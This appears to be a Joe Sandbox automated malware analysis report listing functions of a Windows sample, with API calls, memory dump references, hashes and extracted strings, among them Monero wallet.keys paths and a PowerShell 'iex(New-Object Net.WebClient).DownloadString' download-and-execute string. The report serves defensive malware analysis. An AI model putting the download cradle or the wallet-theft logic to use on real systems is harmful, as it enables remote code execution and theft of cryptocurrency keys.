                                      • CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 1603f8058d08d3f046a65f50300eb0a6463ac4c3553f06706214eda6af2729f0
                                      • Instruction ID: 69d88a7d1c8c14edc3ef52559297ce337359226e5e701172099c8d96dfe620bb
                                      • Opcode Fuzzy Hash: 1603f8058d08d3f046a65f50300eb0a6463ac4c3553f06706214eda6af2729f0
                                      • Instruction Fuzzy Hash: 80310E74A01209EFDB15CF94D885BEE7BB9BF48300F508158E911AB2D0D774AA81CFA1
                                      Function 0011D880 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D901
                                      • lstrlen.KERNEL32(00000000), ref: 0011DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 0011DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011DB32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID: X
                                      • API String ID: 211194620-1677210272
                                      • Opcode ID: fc84354bfa32075c28bd044dd6893313cfaa118addc5ad9454835e93066403e9
                                      • Instruction ID: 9b1b7101a657340e6b5d238606df15409a8ee4b377df7a63bd0d4bc6f891a77c
                                      • Opcode Fuzzy Hash: fc84354bfa32075c28bd044dd6893313cfaa118addc5ad9454835e93066403e9
                                      • Instruction Fuzzy Hash: BC81F7729101189BCB15FBA4EDA6DEE733DAF64300F804558F51677091EF307A68CB62
                                      Function 00122EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00122FD5
                                      Strings
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00122F14
                                      • ')", xrefs: 00122F03
                                      • <, xrefs: 00122F89
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00122F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 828f5e9ef5e69c1dcc69ee4aaceaa229b586866de0f6233e15c59bcc14624ec0
                                      • Instruction ID: ca5a4a47daa24b87dea1da6a40488a793cd72859fa095c80b305b660e73a8961
                                      • Opcode Fuzzy Hash: 828f5e9ef5e69c1dcc69ee4aaceaa229b586866de0f6233e15c59bcc14624ec0
                                      • Instruction Fuzzy Hash: 2241ED71D102289BDB14EFA0E8A2BEDB779AF24300F804559F11677192EF742A59CF51
                                      Function 0018CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 77a38214509637941a9ca8ac3328bd6d7e7c24535d754cda2e7afea8894516f9
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 60219D72D00628AFDB21BF69CC41A6F7A79EB91BA4F064119F909A7211C3308F418FF0
                                      Function 00126BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00126C0C
                                      • sscanf.NTDLL ref: 00126C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00126C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00126C60
                                      • ExitProcess.KERNEL32 ref: 00126C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: cca95a9a1834adcb9d757ebf4805bc34392410ec207f91fa56cd0f13f68467a1
                                      • Instruction ID: ff8e92cac5060a2e065565512deae47e43a271adbdc9b4fae50d5d707f319eab
                                      • Opcode Fuzzy Hash: cca95a9a1834adcb9d757ebf4805bc34392410ec207f91fa56cd0f13f68467a1
                                      • Instruction Fuzzy Hash: E821ED75D0425C9BCF15EFE4E9459EEB7B9BF48300F048629E506B7290EB349614CB64
                                      Function 001293F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(00E3F710,00000000,00000000,?,00119F71,00000000,00E3F710,00000000), ref: 001293FC
                                      • lstrcpyn.KERNEL32(003E7580,00E3F710,00E3F710,?,00119F71,00000000,00E3F710), ref: 00129420
                                      • lstrlen.KERNEL32(00000000,?,00119F71,00000000,00E3F710), ref: 00129437
                                      • wsprintfA.USER32 ref: 00129457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: ef1107a821a6a6da801f14a989fa9db5bf4543a5f6ee25f04e378036e9bc3e9a
                                      • Instruction ID: bf57650dd31d6b6339056e393fe2a70d9102eae56f5b9c71af08678e9dfcafe9
                                      • Opcode Fuzzy Hash: ef1107a821a6a6da801f14a989fa9db5bf4543a5f6ee25f04e378036e9bc3e9a
                                      • Instruction Fuzzy Hash: 52011E7650424CFFDB05DFA8D994EEE7B78EB48304F108258F9099B280D731AA50DB90
                                      Function 001112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001112B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001112BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001112D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001112F5
                                      • RegCloseKey.ADVAPI32(?), ref: 001112FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 14f5c19ece4095b209725f62aad22c7b396a4b8bb6b8be0dfeba2391920aea50
                                      • Instruction ID: 014acc766eb5fe613f6b17f679e29251bbb2837cc8494d8a6714fb4190103e70
                                      • Opcode Fuzzy Hash: 14f5c19ece4095b209725f62aad22c7b396a4b8bb6b8be0dfeba2391920aea50
                                      • Instruction Fuzzy Hash: 5301CD79A44309BBDB14DFD4DC89FAEB77CAB48701F104699FB059B2C0D770AA408B90
                                      Function 0012CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: f6e1f0b8e6236b9c5be82db6efa2ff3b65369c14ebabdb35c1c0bc480e60319b
                                      • Instruction ID: c78a94a7e382e4af198d9901be4618d8fb76bc7b98d5f61353ad0bfbefb23cf2
                                      • Opcode Fuzzy Hash: f6e1f0b8e6236b9c5be82db6efa2ff3b65369c14ebabdb35c1c0bc480e60319b
                                      • Instruction Fuzzy Hash: A341F5B01007AC5FDB218B24EC85FFB7BE89B45704F1444A8EA8A96182D3719A649FA0
                                      Function 0011A7D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentVariableA.KERNEL32(00E39100,003E7D88,0000FFFF), ref: 0011A7ED
                                      • LoadLibraryA.KERNEL32(00E26298), ref: 0011A876
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • SetEnvironmentVariableA.KERNEL32(00E39100,00000000,00000000,?,0013137C,?,?,003E7D88,00130B0A), ref: 0011A862
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                      • String ID:
                                      • API String ID: 2929475105-2740779761
                                      • Opcode ID: 15561a40c159f78e5706a811f3cd8ba4c3fdf467b63fef59105888a180e03fc1
                                      • Instruction ID: b27162b6e368cfbde6d57781694ae2218a51ab411221fbfab30e486b2a7b936e
                                      • Opcode Fuzzy Hash: 15561a40c159f78e5706a811f3cd8ba4c3fdf467b63fef59105888a180e03fc1
                                      • Instruction Fuzzy Hash: 38411F719142449FC72AEBA4FC96BEE37B9BF18305F404628F505AB2E1E7305D98CB61
                                      Function 001268D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00126903
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 001269C6
                                      • ExitProcess.KERNEL32 ref: 001269F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
